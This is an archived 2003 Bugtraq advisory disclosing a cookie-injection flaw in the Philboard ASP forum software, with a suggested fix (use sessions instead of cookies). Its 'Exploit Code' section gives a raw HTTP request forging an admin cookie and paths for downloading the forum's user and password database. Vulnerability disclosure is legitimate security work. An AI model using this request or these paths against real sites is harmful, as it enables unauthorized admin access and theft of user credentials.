lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <1054198125.3ed5c96d45e59@webmail.bosen.net>
Date: Thu, 29 May 2003 15:48:45 +0700
From: aresu@...en.net
To: bugtraq@...urityfocus.com
Subject: Philboard Forum Vulnerability


Philboard Vulnerability

Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status    : Vendor contacted, fixed version is not available (cause they didn't 
response)
Author    : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka, 
and All 1ndonesian Security Team (1st)
#romance@...trin.net.id
http://www.bosen.net/releases/

Summary
=======
Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for 
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"

Acknowledgments
===============
Vulnerability discovery and advisory by AresU

Vendor Response
===============
Vendor has contacted and fixed version is not available (cause they didn't 
reponse)
To Fix the script, you must change every cookie command in to session command.

Exploit Code
============
1) Login Administrator Forum:
Use your telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb


-----------------------------------------------
This mail sent through http://webmail.bosen.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ